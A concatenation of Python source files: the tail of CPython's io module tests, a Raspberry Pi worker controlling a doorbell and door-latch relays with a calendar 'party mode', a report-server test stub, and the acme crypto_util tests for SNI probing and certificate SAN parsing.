self.assertEqual(content.count("Thread%03d\n" % n), 1)
def test_flush_error_on_close(self):
# Test that text file is closed despite failed flush
# and that flush() is called before file closed.
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
closed = []
def bad_flush():
closed[:] = [txt.closed, txt.buffer.closed]
raise IOError()
txt.flush = bad_flush
self.assertRaises(IOError, txt.close) # exception not swallowed
self.assertTrue(txt.closed)
self.assertTrue(txt.buffer.closed)
self.assertTrue(closed) # flush() called
self.assertFalse(closed[0]) # flush() called before file closed
self.assertFalse(closed[1])
txt.flush = lambda: None # break reference loop
def test_multi_close(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt.close()
txt.close()
txt.close()
self.assertRaises(ValueError, txt.flush)
def test_readonly_attributes(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
buf = self.BytesIO(self.testdata)
with self.assertRaises((AttributeError, TypeError)):
txt.buffer = buf
def test_read_nonbytes(self):
# Issue #17106
# Crash when underlying read() returns non-bytes
class NonbytesStream(self.StringIO):
read1 = self.StringIO.read
class NonbytesStream(self.StringIO):
read1 = self.StringIO.read
t = self.TextIOWrapper(NonbytesStream('a'))
with self.maybeRaises(TypeError):
t.read(1)
t = self.TextIOWrapper(NonbytesStream('a'))
with self.maybeRaises(TypeError):
t.readline()
t = self.TextIOWrapper(NonbytesStream('a'))
self.assertEqual(t.read(), u'a')
def test_illegal_decoder(self):
# Issue #17106
# Crash when decoder returns non-string
t = self.TextIOWrapper(self.BytesIO(b'aaaaaa'), newline='\n',
encoding='quopri_codec')
with self.maybeRaises(TypeError):
t.read(1)
t = self.TextIOWrapper(self.BytesIO(b'aaaaaa'), newline='\n',
encoding='quopri_codec')
with self.maybeRaises(TypeError):
t.readline()
t = self.TextIOWrapper(self.BytesIO(b'aaaaaa'), newline='\n',
encoding='quopri_codec')
with self.maybeRaises(TypeError):
t.read()
class CTextIOWrapperTest(TextIOWrapperTest):
def test_initialization(self):
r = self.BytesIO(b"\xc3\xa9\n\n")
b = self.BufferedReader(r, 1000)
t = self.TextIOWrapper(b)
self.assertRaises(TypeError, t.__init__, b, newline=42)
self.assertRaises(ValueError, t.read)
self.assertRaises(ValueError, t.__init__, b, newline='xyzzy')
self.assertRaises(ValueError, t.read)
t = self.TextIOWrapper.__new__(self.TextIOWrapper)
self.assertRaises(Exception, repr, t)
def test_garbage_collection(self):
# C TextIOWrapper objects are collected, and collecting them flushes
# all data to disk.
# The Python version has __del__, so it ends in gc.garbage instead.
rawio = io.FileIO(support.TESTFN, "wb")
b = self.BufferedWriter(rawio)
t = self.TextIOWrapper(b, encoding="ascii")
t.write("456def")
t.x = t
wr = weakref.ref(t)
del t
support.gc_collect()
self.assertTrue(wr() is None, wr)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"456def")
def test_rwpair_cleared_before_textio(self):
# Issue 13070: TextIOWrapper's finalization would crash when called
# after the reference to the underlying BufferedRWPair's writer got
# cleared by the GC.
for i in range(1000):
b1 = self.BufferedRWPair(self.MockRawIO(), self.MockRawIO())
t1 = self.TextIOWrapper(b1, encoding="ascii")
b2 = self.BufferedRWPair(self.MockRawIO(), self.MockRawIO())
t2 = self.TextIOWrapper(b2, encoding="ascii")
# circular references
t1.buddy = t2
t2.buddy = t1
support.gc_collect()
maybeRaises = unittest.TestCase.assertRaises
class PyTextIOWrapperTest(TextIOWrapperTest):
@contextlib.contextmanager
def maybeRaises(self, *args, **kwds):
yield
class IncrementalNewlineDecoderTest(unittest.TestCase):
def check_newline_decoding_utf8(self, decoder):
# UTF-8 specific tests for a newline decoder
def _check_decode(b, s, **kwargs):
# We exercise getstate() / setstate() as well as decode()
state = decoder.getstate()
self.assertEqual(decoder.decode(b, **kwargs), s)
decoder.setstate(state)
self.assertEqual(decoder.decode(b, **kwargs), s)
_check_decode(b'\xe8\xa2\x88', "\u8888")
_check_decode(b'\xe8', "")
_check_decode(b'\xa2', "")
_check_decode(b'\x88', "\u8888")
_check_decode(b'\xe8', "")
_check_decode(b'\xa2', "")
_check_decode(b'\x88', "\u8888")
_check_decode(b'\xe8', "")
self.assertRaises(UnicodeDecodeError, decoder.decode, b'', final=True)
decoder.reset()
_check_decode(b'\n', "\n")
_check_decode(b'\r', "")
_check_decode(b'', "\n", final=True)
_check_decode(b'\r', "\n", final=True)
_check_decode(b'\r', "")
_check_decode(b'a', "\na")
_check_decode(b'\r\r\n', "\n\n")
_check_decode(b'\r', "")
_check_decode(b'\r', "\n")
_check_decode(b'\na', "\na")
_check_decode(b'\xe8\xa2\x88\r\n', "\u8888\n")
_check_decode(b'\xe8\xa2\x88', "\u8888")
_check_decode(b'\n', "\n")
_check_decode(b'\xe8\xa2\x88\r', "\u8888")
_check_decode(b'\n', "\n")
def check_newline_decoding(self, decoder, encoding):
result = []
if encoding is not None:
encoder = codecs.getincrementalencoder(encoding)()
def _decode_bytewise(s):
# Decode one byte at a time
for b in encoder.encode(s):
result.append(decoder.decode(b))
else:
encoder = None
def _decode_bytewise(s):
# Decode one char at a time
for c in s:
result.append(decoder.decode(c))
self.assertEqual(decoder.newlines, None)
_decode_bytewise("abc\n\r")
self.assertEqual(decoder.newlines, '\n')
_decode_bytewise("\nabc")
self.assertEqual(decoder.newlines, ('\n', '\r\n'))
_decode_bytewise("abc\r")
self.assertEqual(decoder.newlines, ('\n', '\r\n'))
_decode_bytewise("abc")
self.assertEqual(decoder.newlines, ('\r', '\n', '\r\n'))
_decode_bytewise("abc\r")
self.assertEqual("".join(result), "abc\n\nabcabc\nabcabc")
decoder.reset()
input = "abc"
if encoder is not None:
encoder.reset()
input = encoder.encode(input)
self.assertEqual(decoder.decode(input), "abc")
self.assertEqual(decoder.newlines, None)
def test_newline_decoder(self):
encodings = (
# None meaning the IncrementalNewlineDecoder takes unicode input
# rather than bytes input
None, 'utf-8', 'latin-1',
'utf-16', 'utf-16-le', 'utf-16-be',
'utf-32', 'utf-32-le', 'utf-32-be',
)
for enc in encodings:
decoder = enc and codecs.getincrementaldecoder(enc)()
decoder = self.IncrementalNewlineDecoder(decoder, translate=True)
self.check_newline_decoding(decoder, enc)
decoder = codecs.getincrementaldecoder("utf-8")()
decoder = self.IncrementalNewlineDecoder(decoder, translate=True)
self.check_newline_decoding_utf8(decoder)
def test_newline_bytes(self):
# Issue 5433: Excessive optimization in IncrementalNewlineDecoder
def _check(dec):
self.assertEqual(dec.newlines, None)
self.assertEqual(dec.decode("\u0D00"), "\u0D00")
self.assertEqual(dec.newlines, None)
self.assertEqual(dec.decode("\u0A00"), "\u0A00")
self.assertEqual(dec.newlines, None)
dec = self.IncrementalNewlineDecoder(None, translate=False)
_check(dec)
dec = self.IncrementalNewlineDecoder(None, translate=True)
_check(dec)
class CIncrementalNewlineDecoderTest(IncrementalNewlineDecoderTest):
pass
class PyIncrementalNewlineDecoderTest(IncrementalNewlineDecoderTest):
pass
# XXX Tests for open()
class MiscIOTest(unittest.TestCase):
def tearDown(self):
support.unlink(support.TESTFN)
def test___all__(self):
for name in self.io.__all__:
obj = getattr(self.io, name, None)
self.assertTrue(obj is not None, name)
if name == "open":
continue
elif "error" in name.lower() or name == "UnsupportedOperation":
self.assertTrue(issubclass(obj, Exception), name)
elif not name.startswith("SEEK_"):
self.assertTrue(issubclass(obj, self.IOBase))
def test_attributes(self):
f = self.open(support.TESTFN, "wb", buffering=0)
self.assertEqual(f.mode, "wb")
f.close()
f = self.open(support.TESTFN, "U")
self.assertEqual(f.name, support.TESTFN)
self.assertEqual(f.buffer.name, support.TESTFN)
self.assertEqual(f.buffer.raw.name, support.TESTFN)
self.assertEqual(f.mode, "U")
self.assertEqual(f.buffer.mode, "rb")
self.assertEqual(f.buffer.raw.mode, "rb")
f.close()
f = self.open(support.TESTFN, "w+")
self.assertEqual(f.mode, "w+")
self.assertEqual(f.buffer.mode, "rb+") # Does it really matter?
self.assertEqual(f.buffer.raw.mode, "rb+")
g = self.open(f.fileno(), "wb", closefd=False)
self.assertEqual(g.mode, "wb")
self.assertEqual(g.raw.mode, "wb")
self.assertEqual(g.name, f.fileno())
self.assertEqual(g.raw.name, f.fileno())
f.close()
g.close()
def test_io_after_close(self):
for kwargs in [
{"mode": "w"},
{"mode": "wb"},
{"mode": "w", "buffering": 1},
{"mode": "w", "buffering": 2},
{"mode": "wb", "buffering": 0},
{"mode": "r"},
{"mode": "rb"},
{"mode": "r", "buffering": 1},
{"mode": "r", "buffering": 2},
{"mode": "rb", "buffering": 0},
{"mode": "w+"},
{"mode": "w+b"},
{"mode": "w+", "buffering": 1},
{"mode": "w+", "buffering": 2},
{"mode": "w+b", "buffering": 0},
]:
f = self.open(support.TESTFN, **kwargs)
f.close()
self.assertRaises(ValueError, f.flush)
self.assertRaises(ValueError, f.fileno)
self.assertRaises(ValueError, f.isatty)
self.assertRaises(ValueError, f.__iter__)
if hasattr(f, "peek"):
self.assertRaises(ValueError, f.peek, 1)
self.assertRaises(ValueError, f.read)
if hasattr(f, "read1"):
self.assertRaises(ValueError, f.read1, 1024)
if hasattr(f, "readall"):
self.assertRaises(ValueError, f.readall)
if hasattr(f, "readinto"):
self.assertRaises(ValueError, f.readinto, bytearray(1024))
self.assertRaises(ValueError, f.readline)
self.assertRaises(ValueError, f.readlines)
self.assertRaises(ValueError, f.seek, 0)
self.assertRaises(ValueError, f.tell)
self.assertRaises(ValueError, f.truncate)
self.assertRaises(ValueError, f.write,
b"" if "b" in kwargs['mode'] else "")
self.assertRaises(ValueError, f.writelines, [])
self.assertRaises(ValueError, next, f)
def test_blockingioerror(self):
# Various BlockingIOError issues
self.assertRaises(TypeError, self.BlockingIOError)
self.assertRaises(TypeError, self.BlockingIOError, 1)
self.assertRaises(TypeError, self.BlockingIOError, 1, 2, 3, 4)
self.assertRaises(TypeError, self.BlockingIOError, 1, "", None)
b = self.BlockingIOError(1, "")
self.assertEqual(b.characters_written, 0)
class C(unicode):
pass
c = C("")
b = self.BlockingIOError(1, c)
c.b = b
b.c = c
wr = weakref.ref(c)
del c, b
support.gc_collect()
self.assertTrue(wr() is None, wr)
def test_abcs(self):
# Test the visible base classes are ABCs.
self.assertIsInstance(self.IOBase, abc.ABCMeta)
self.assertIsInstance(self.RawIOBase, abc.ABCMeta)
self.assertIsInstance(self.BufferedIOBase, abc.ABCMeta)
self.assertIsInstance(self.TextIOBase, abc.ABCMeta)
def _check_abc_inheritance(self, abcmodule):
with self.open(support.TESTFN, "wb", buffering=0) as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertIsInstance(f, abcmodule.RawIOBase)
self.assertNotIsInstance(f, abcmodule.BufferedIOBase)
self.assertNotIsInstance(f, abcmodule.TextIOBase)
with self.open(support.TESTFN, "wb") as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertNotIsInstance(f, abcmodule.RawIOBase)
self.assertIsInstance(f, abcmodule.BufferedIOBase)
self.assertNotIsInstance(f, abcmodule.TextIOBase)
with self.open(support.TESTFN, "w") as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertNotIsInstance(f, abcmodule.RawIOBase)
self.assertNotIsInstance(f, abcmodule.BufferedIOBase)
self.assertIsInstance(f, abcmodule.TextIOBase)
def test_abc_inheritance(self):
# Test implementations inherit from their respective ABCs
self._check_abc_inheritance(self)
def test_abc_inheritance_official(self):
# Test implementations inherit from the official ABCs of the
# baseline "io" module.
self._check_abc_inheritance(io)
@unittest.skipUnless(fcntl, 'fcntl required for this test')
def test_nonblock_pipe_write_bigbuf(self):
self._test_nonblock_pipe_write(16*1024)
@unittest.skipUnless(fcntl, 'fcntl required for this test')
def test_nonblock_pipe_write_smallbuf(self):
self._test_nonblock_pipe_write(1024)
def _set_non_blocking(self, fd):
flags = fcntl.fcntl(fd, fcntl.F_GETFL)
self.assertNotEqual(flags, -1)
res = fcntl.fcntl(fd, fcntl.F_SETFL, flags | os.O_NONBLOCK)
self.assertEqual(res, 0)
def _test_nonblock_pipe_write(self, bufsize):
sent = []
received = []
r, w = os.pipe()
self._set_non_blocking(r)
self._set_non_blocking(w)
# To exercise all code paths in the C implementation we need
# to play with buffer sizes. For instance, if we choose a
# buffer size less than or equal to _PIPE_BUF (4096 on Linux)
# then we will never get a partial write of the buffer.
rf = self.open(r, mode='rb', closefd=True, buffering=bufsize)
wf = self.open(w, mode='wb', closefd=True, buffering=bufsize)
with rf, wf:
for N in 9999, 73, 7574:
try:
i = 0
while True:
msg = bytes([i % 26 + 97]) * N
sent.append(msg)
wf.write(msg)
i += 1
except self.BlockingIOError as e:
self.assertEqual(e.args[0], errno.EAGAIN)
sent[-1] = sent[-1][:e.characters_written]
received.append(rf.read())
msg = b'BLOCKED'
wf.write(msg)
sent.append(msg)
while True:
try:
wf.flush()
break
except self.BlockingIOError as e:
self.assertEqual(e.args[0], errno.EAGAIN)
self.assertEqual(e.characters_written, 0)
received.append(rf.read())
received += iter(rf.read, None)
sent, received = b''.join(sent), b''.join(received)
self.assertTrue(sent == received)
self.assertTrue(wf.closed)
self.assertTrue(rf.closed)
class CMiscIOTest(MiscIOTest):
io = io
class PyMiscIOTest(MiscIOTest):
io = pyio
@unittest.skipIf(os.name == 'nt', 'POSIX signals required for this test.')
class SignalsTest(unittest.TestCase):
def setUp(self):
self.oldalrm = signal.signal(signal.SIGALRM, self.alarm_interrupt)
def tearDown(self):
signal.signal(signal.SIGALRM, self.oldalrm)
def alarm_interrupt(self, sig, frame):
1 // 0
@unittest.skipUnless(threading, 'Threading required for this test.')
@unittest.skipIf(sys.platform in ('freebsd5', 'freebsd6', 'freebsd7'),
'issue #12429: skip test on FreeBSD <= 7')
def check_interrupted_write(self, item, bytes, **fdopen_kwargs):
"""Check that a partial write, when it gets interrupted, properly
invokes the signal handler, and bubbles up the exception raised
in the latter."""
read_results = []
def _read():
s = os.read(r, 1)
read_results.append(s)
t = threading.Thread(target=_read)
t.daemon = True
r, w = os.pipe()
try:
wio = self.io.open(w, **fdopen_kwargs)
t.start()
signal.alarm(1)
# Fill the pipe enough that the write will be blocking.
# It will be interrupted by the timer armed above. Since the
# other thread has read one byte, the low-level write will
# return with a successful (partial) result rather than an EINTR.
# The buffered IO layer must check for pending signal
# handlers, which in this case will invoke alarm_interrupt().
self.assertRaises(ZeroDivisionError,
wio.write, item * (support.PIPE_MAX_SIZE // len(item) + 1))
t.join()
# We got one byte, get another one and check that it isn't a
# repeat of the first one.
read_results.append(os.read(r, 1))
self.assertEqual(read_results, [bytes[0:1], bytes[1:2]])
finally:
os.close(w)
os.close(r)
# This is deliberate. If we didn't close the file descriptor
# before closing wio, wio would try to flush its internal
# buffer, and block again.
try:
wio.close()
except IOError as e:
if e.errno != errno.EBADF:
raise
def test_interrupted_write_unbuffered(self):
self.check_interrupted_write(b"xy", b"xy", mode="wb", buffering=0)
def test_interrupted_write_buffered(self):
self.check_interrupted_write(b"xy", b"xy", mode="wb")
def test_interrupted_write_text(self):
self.check_interrupted_write("xy", b"xy", mode="w", encoding="ascii")
def check_reentrant_write(self, data, **fdopen_kwargs):
def on_alarm(*args):
# Will be called reentrantly from the same thread
wio.write(data)
1//0
signal.signal(signal.SIGALRM, on_alarm)
r, w = os.pipe()
wio = self.io.open(w, **fdopen_kwargs)
try:
signal.alarm(1)
# Either the reentrant call to wio.write() fails with RuntimeError,
# or the signal handler raises ZeroDivisionError.
with self.assertRaises((ZeroDivisionError, RuntimeError)) as cm:
while 1:
for i in range(100):
wio.write(data)
wio.flush()
# Make sure the buffer doesn't fill up and block further writes
os.read(r, len(data) * 100)
exc = cm.exception
if isinstance(exc, RuntimeError):
self.assertTrue(str(exc).startswith("reentrant call"), str(exc))
finally:
wio.close()
os.close(r)
def test_reentrant_write_buffered(self):
self.check_reentrant_write(b"xy", mode="wb")
def test_reentrant_write_text(self):
self.check_reentrant_write("xy", mode="w", encoding="ascii")
def check_interrupted_read_retry(self, decode, **fdopen_kwargs):
"""Check that a buffered read, when it gets interrupted (either
returning a partial result or EINTR), properly invokes the signal
handler and retries if the latter returned successfully."""
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
def alarm_handler(sig, frame):
os.write(w, b"bar")
signal.signal(signal.SIGALRM, alarm_handler)
try:
rio = self.io.open(r, **fdopen_kwargs)
os.write(w, b"foo")
signal.alarm(1)
# Expected behaviour:
# - first raw read() returns partial b"foo"
# - second raw read() returns EINTR
# - third raw read() returns b"bar"
self.assertEqual(decode(rio.read(6)), "foobar")
finally:
rio.close()
os.close(w)
os.close(r)
def test_interrupterd_read_retry_buffered(self):
self.check_interrupted_read_retry(lambda x: x.decode('latin1'),
mode="rb")
def test_interrupterd_read_retry_text(self):
self.check_interrupted_read_retry(lambda x: x,
mode="r")
@unittest.skipUnless(threading, 'Threading required for this test.')
def check_interrupted_write_retry(self, item, **fdopen_kwargs):
"""Check that a buffered write, when it gets interrupted (either
returning a partial result or EINTR), properly invokes the signal
handler and retries if the latter returned successfully."""
select = support.import_module("select")
# A quantity that exceeds the buffer size of an anonymous pipe's
# write end.
N = support.PIPE_MAX_SIZE
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
# We need a separate thread to read from the pipe and allow the
# write() to finish. This thread is started after the SIGALRM is
# received (forcing a first EINTR in write()).
read_results = []
write_finished = False
def _read():
while not write_finished:
while r in select.select([r], [], [], 1.0)[0]:
s = os.read(r, 1024)
read_results.append(s)
t = threading.Thread(target=_read)
t.daemon = True
def alarm1(sig, frame):
signal.signal(signal.SIGALRM, alarm2)
signal.alarm(1)
def alarm2(sig, frame):
t.start()
signal.signal(signal.SIGALRM, alarm1)
try:
wio = self.io.open(w, **fdopen_kwargs)
signal.alarm(1)
# Expected behaviour:
# - first raw write() is partial (because of the limited pipe buffer
# and the first alarm)
# - second raw write() returns EINTR (because of the second alarm)
# - subsequent write()s are successful (either partial or complete)
self.assertEqual(N, wio.write(item * N))
wio.flush()
write_finished = True
t.join()
self.assertEqual(N, sum(len(x) for x in read_results))
finally:
write_finished = True
os.close(w)
os.close(r)
# This is deliberate. If we didn't close the file descriptor
# before closing wio, wio would try to flush its internal
# buffer, and could block (in case of failure).
try:
wio.close()
except IOError as e:
if e.errno != errno.EBADF:
raise
def test_interrupterd_write_retry_buffered(self):
self.check_interrupted_write_retry(b"x", mode="wb")
def test_interrupterd_write_retry_text(self):
self.check_interrupted_write_retry("x", mode="w", encoding="latin1")
class CSignalsTest(SignalsTest):
io = io
class PySignalsTest(SignalsTest):
io = pyio
# Handling reentrancy issues would slow down _pyio even more, so the
# tests are disabled.
test_reentrant_write_buffered = None
test_reentrant_write_text = None
def test_main():
tests = (CIOTest, PyIOTest,
CBufferedReaderTest, PyBufferedReaderTest,
CBufferedWriterTest, PyBufferedWriterTest,
CBufferedRWPairTest, PyBufferedRWPairTest,
CBufferedRandomTest, PyBufferedRandomTest,
StatefulIncrementalDecoderTest,
CIncrementalNewlineDecoderTest, PyIncrementalNewlineDecoderTest,
CTextIOWrapperTest, PyTextIOWrapperTest,
CMiscIOTest, PyMiscIOTest,
CSignalsTest, PySignalsTest,
)
# Put the namespaces of the IO module we are testing and some useful mock
# classes in the __dict__ of each test.
mocks = (MockRawIO, MisbehavedRawIO, MockFileIO, CloseFailureIO,
MockNonBlockWriterIO, MockRawIOWithoutRead)
all_members = io.__all__ + ["IncrementalNewlineDecoder"]
c_io_ns = dict((name, getattr(io, name)) for name in all_members)
py_io_ns = dict((name, getattr(pyio, name)) for name in all_members)
globs = globals()
c_io_ns.update((x.__name__, globs["C" + x.__name__]) for x in mocks)
py_io_ns.update((x.__name__, globs["Py" + x.__name__]) for x in mocks)
# Avoid turning open into a bound method.
py_io_ns["open"] = pyio.OpenWrapper
for test in tests:
if test.__name__.startswith("C"):
for name, obj in c_io_ns.items():
setattr(test, name, obj)
elif test.__name__.startswith("Py"):
for name, obj in py_io_ns.items():
setattr(test, name, obj)
support.run_unittest(*tests)
if __name__ == "__main__":
test_main()
|
worker.py
|
import time
import logging
from functools import wraps
from multiprocessing import Queue
from threading import Thread
LOG = logging.getLogger(__name__)
try:
import RPi.GPIO as GPIO
except RuntimeError:
LOG.warn("Not running on Raspberry Pi; controls unavailable")
def async(function):
@wraps(function)
def wrapper(*args, **kwargs):
t = Thread(target=function, args=args, kwargs=kwargs)
t.daemon = True
t.start()
return t
return wrapper
class BaseWorker(Thread):
"""
Worker thread that interfaces with relays.
The only safe method to call from another thread is :meth:`~.do`.
Parameters
----------
calendar : :class:`stiny.gutil.Calendar`
Stiny wrapper for Google Calendar API
in_map : dict, optional
Mapping for names of input relays to the relay index
out_map : dict, optional
Mapping for names of output relays to the relay index
isolate : bool, optional
If True, don't attempt to send signals to the relays. Useful for local
development (default False)
input_throttle : float, optional
Relay states may change at most once per this time range (default 0.1)
"""
def __init__(self, *args, **kwargs):
self.cal = kwargs.pop('calendar')
self._isolate = kwargs.pop('isolate', False)
self._in_map = kwargs.pop('in_map', {})
self._out_map = kwargs.pop('out_map', {})
self._input_throttle = kwargs.pop('input_throttle', 0.1)
super(BaseWorker, self).__init__(*args, **kwargs)
self._msg_queue = Queue()
self._state = {key: False for key in self._out_map}
self._last_read_time = {}
self._btn_states = {}
def setup(self):
""" Initialize the relays. """
if self._isolate:
return
GPIO.setmode(GPIO.BCM)
for idx in self._out_map.values():
GPIO.setup(idx, GPIO.OUT)
for idx in self._in_map.values():
GPIO.setup(idx, GPIO.IN, pull_up_down=GPIO.PUD_UP)
def _write(self, relay, on):
""" Write a state to a relay. """
if self._isolate:
return False
GPIO.output(self._out_map[relay], 1 if on else 0)
def _get(self, relay):
"""
Get on/off state from an input.
Returns
-------
on : bool
"""
if self._isolate:
return False
return not GPIO.input(self._in_map[relay])
def _get_input(self, relay):
"""
Get throttled state of input.
Returns
-------
changed : bool
True if the state is different from last call.
on : bool
"""
now = time.time()
# Sometimes the input switches jitter, so throttle the changes.
if self._last_read_time.get(relay, 0) + self._input_throttle > now:
return False, None
self._last_read_time[relay] = now
state = self._get(relay)
changed = state != self._btn_states.setdefault(relay, False)
self._btn_states[relay] = state
return changed, state
def _listen_for_inputs(self):
""" Check all inputs and queue commands if activated. """
for name in self._in_map:
changed, state = self._get_input(name)
if changed:
self.trigger_input(name, state)
def get_inputs(self):
return self._in_map.keys()
def trigger_input(self, name, state):
"""
Trigger one of the inputs
Parameters
----------
name : str
Name of the input to trigger
state : bool
On/off state of the input
"""
method_name = 'on_%s' % name
LOG.debug("Received input %s", method_name)
meth = getattr(self, method_name, None)
if meth is None:
LOG.warning("Unhandled input %r", method_name)
return
try:
meth(state)
except TypeError:
LOG.exception("Bad arguments")
def _process_messages(self):
""" Process all messages in the queue. """
requeue = []
while not self._msg_queue.empty():
msg = self._msg_queue.get()
# If the message has a start time, it might not be time to run it
# yet. Requeue it after processing other messages.
if 'run_after' in msg and time.time() < msg['run_after']:
requeue.append(msg)
continue
method_name = 'do_%s' % msg['command']
LOG.debug("Running %s, %s", method_name, msg['data'])
meth = getattr(self, method_name, None)
if meth is None:
LOG.error("Bad command %r", method_name)
continue
try:
meth(**msg['data'])
except TypeError:
LOG.exception("Bad arguments")
for msg in requeue:
self._msg_queue.put(msg)
def do_on(self, relay):
""" Turn a relay on. """
self._state[relay] = True
def do_off(self, relay):
""" Turn a relay off. """
self._state[relay] = False
def do_on_off(self, relay, duration):
"""
Turn a relay on, then off.
Parameters
----------
relay : str
Name of the relay.
duration : float
Number of seconds to keep relay on.
"""
self.do_on(relay)
self.do('off', delay=duration, relay=relay)
def do(self, command, delay=None, run_after=None, **kwargs):
"""
Thread-safe way to enqueue a message.
Parameters
----------
command : str
Name of command. Will run the method "do_[command]".
delay : float, optional
Wait for this many seconds, then run the command.
run_after : float, optional
Unix timestamp. Will wait until this time before running the
command.
**kwargs : dict, optional
Pass these arguments to the method being run.
"""
if delay is not None and run_after is not None:
raise TypeError("Cannot specify 'delay' and 'run_after'")
msg = {
'command': command,
'data': kwargs,
}
if delay is not None:
msg['run_after'] = time.time() + delay
elif run_after is not None:
msg['run_after'] = run_after
self._msg_queue.put(msg)
def run(self):
self.setup()
while True:
self._listen_for_inputs()
self._process_messages()
if not self._isolate:
for relay, on in self._state.iteritems():
self._write(relay, on)
time.sleep(0.01)
class DoorWorker(BaseWorker):
""" Worker for the door buzzer and doorbell relays. """
def __init__(self, *args, **kwargs):
kwargs.setdefault('out_map', {
'doorbell': 7,
'outside_latch': 4,
})
kwargs.setdefault('in_map', {
'doorbell_button': 22,
'buzzer': 23,
})
super(DoorWorker, self).__init__(*args, **kwargs)
self.party_delay = 4
def on_doorbell_button(self, state):
"""
Ring doorbell when doorbell is pressed.
If in party mode, also open the door.
"""
self.do('on' if state else 'off', relay='doorbell')
if not state:
self._open_if_party()
@async
def _open_if_party(self):
now = time.time()
if self.cal.is_party_time():
# Factor out the network request time from the delay
delta = time.time() - now
delay = max(0, self.party_delay - delta)
LOG.debug("PARTY TIME (delay %.02f)", delay)
self.do('on_off', delay=delay, duration=3,
relay='outside_latch')
else:
LOG.debug("No party")
def on_buzzer(self, state):
""" Open the door when buzzer is pressed """
self.do('on' if state else 'off', relay='outside_latch')
|
test_report_server.py
|
# -*- coding: utf-8 -*-
"""Module unittests.test_report_server.py
This module contains methods to test the report_server module via pytest.
"""
import os
import time
import signal
from multiprocessing import Process
from compliance_suite.report_server import capitalize, ReportServer
from unittests.constants import OUTPUT_DIR
# TODO: re-enable test once I've figured out how to get it working on travis ci
# def spawn_report_server():
# """spawn a sample report server as a subprocess"""
# rs = ReportServer(OUTPUT_DIR)
# rs.set_free_port()
# rs.serve_thread()
def test_capitalize():
"""asserts capitalize function works as expected"""
word = "word"
assert capitalize(word) == "Word"
# TODO: re-enable test once I've figured out how to get it working on travis ci
# def test_keyboard_interrupt():
# """asserts keyboard interrupts are caught and lead to program shutdown"""
#
# # start a server, send a keyboard interrupt to the process, then check
# # that the process is no longer alive and exited without error (code 0)
# def subprocess():
# rs = ReportServer(OUTPUT_DIR)
# rs.set_free_port()
# rs.serve_thread(uptime=10)
#
# if not os.path.exists(OUTPUT_DIR):
# os.mkdir(OUTPUT_DIR)
#
# p = Process(target=subprocess)
# p.start()
# time.sleep(2)
# os.kill(p.pid, signal.SIGINT)
# time.sleep(2)
# assert p.is_alive() == False
# assert p.exitcode == 0
#
# os.rmdir(OUTPUT_DIR)
|
crypto_util_test.py
|
"""Tests for acme.crypto_util."""
import itertools
import socket
import threading
import time
import unittest
import six
from six.moves import socketserver #type: ignore # pylint: disable=import-error
import OpenSSL
from acme import errors
from acme import jose
from acme import test_util
class SSLSocketAndProbeSNITest(unittest.TestCase):
"""Tests for acme.crypto_util.SSLSocket/probe_sni."""
_multiprocess_can_split_ = True
def setUp(self):
self.cert = test_util.load_comparable_cert('rsa2048_cert.pem')
key = test_util.load_pyopenssl_private_key('rsa2048_key.pem')
# pylint: disable=protected-access
certs = {b'foo': (key, self.cert.wrapped)}
from acme.crypto_util import SSLSocket
class _TestServer(socketserver.TCPServer):
# pylint: disable=too-few-public-methods
# six.moves.* | pylint: disable=attribute-defined-outside-init,no-init
def server_bind(self): # pylint: disable=missing-docstring
self.socket = SSLSocket(socket.socket(), certs=certs)
socketserver.TCPServer.server_bind(self)
self.server = _TestServer(('', 0), socketserver.BaseRequestHandler)
self.port = self.server.socket.getsockname()[1]
self.server_thread = threading.Thread(
# pylint: disable=no-member
target=self.server.handle_request)
self.server_thread.start()
time.sleep(1) # TODO: avoid race conditions in other way
def tearDown(self):
self.server_thread.join()
def _probe(self, name):
from acme.crypto_util import probe_sni
return jose.ComparableX509(probe_sni(
name, host='127.0.0.1', port=self.port))
def test_probe_ok(self):
self.assertEqual(self.cert, self._probe(b'foo'))
def test_probe_not_recognized_name(self):
self.assertRaises(errors.Error, self._probe, b'bar')
# TODO: py33/py34 tox hangs forever on do_handshake in second probe
#def probe_connection_error(self):
# self._probe(b'foo')
# #time.sleep(1) # TODO: avoid race conditions in other way
# self.assertRaises(errors.Error, self._probe, b'bar')
class PyOpenSSLCertOrReqSANTest(unittest.TestCase):
"""Test for acme.crypto_util._pyopenssl_cert_or_req_san."""
_multiprocess_can_split_ = True
@classmethod
def _call(cls, loader, name):
# pylint: disable=protected-access
from acme.crypto_util import _pyopenssl_cert_or_req_san
return _pyopenssl_cert_or_req_san(loader(name))
@classmethod
def _get_idn_names(cls):
"""Returns expected names from '{cert,csr}-idnsans.pem'."""
chars = [six.unichr(i) for i in itertools.chain(range(0x3c3, 0x400),
range(0x641, 0x6fc),
range(0x1820, 0x1877))]
return [''.join(chars[i: i + 45]) + '.invalid'
for i in range(0, len(chars), 45)]
def _call_cert(self, name):
return self._call(test_util.load_cert, name)
def _call_csr(self, name):
return self._call(test_util.load_csr, name)
def test_cert_no_sans(self):
self.assertEqual(self._call_cert('cert.pem'), [])
def test_cert_two_sans(self):
self.assertEqual(self._call_cert('cert-san.pem'),
['example.com', 'www.example.com'])
def test_cert_hundred_sans(self):
self.assertEqual(self._call_cert('cert-100sans.pem'),
['example{0}.com'.format(i) for i in range(1, 101)])
def test_cert_idn_sans(self):
self.assertEqual(self._call_cert('cert-idnsans.pem'),
self._get_idn_names())
def test_csr_no_sans(self):
self.assertEqual(self._call_csr('csr-nosans.pem'), [])
def test_csr_one_san(self):
self.assertEqual(self._call_csr('csr.pem'), ['example.com'])
def test_csr_two_sans(self):
self.assertEqual(self._call_csr('csr-san.pem'),
['example.com', 'www.example.com'])
def test_csr_six_sans(self):
self.assertEqual(self._call_csr('csr-6sans.pem'),
['example.com', 'example.org', 'example.net',
'example.info', 'subdomain.example.com',
'other.subdomain.example.com'])
def test_csr_hundred_sans(self):
self.assertEqual(self._call_csr('csr-100sans.pem'),
['example{0}.com'.format(i) for i in range(1, 101)])
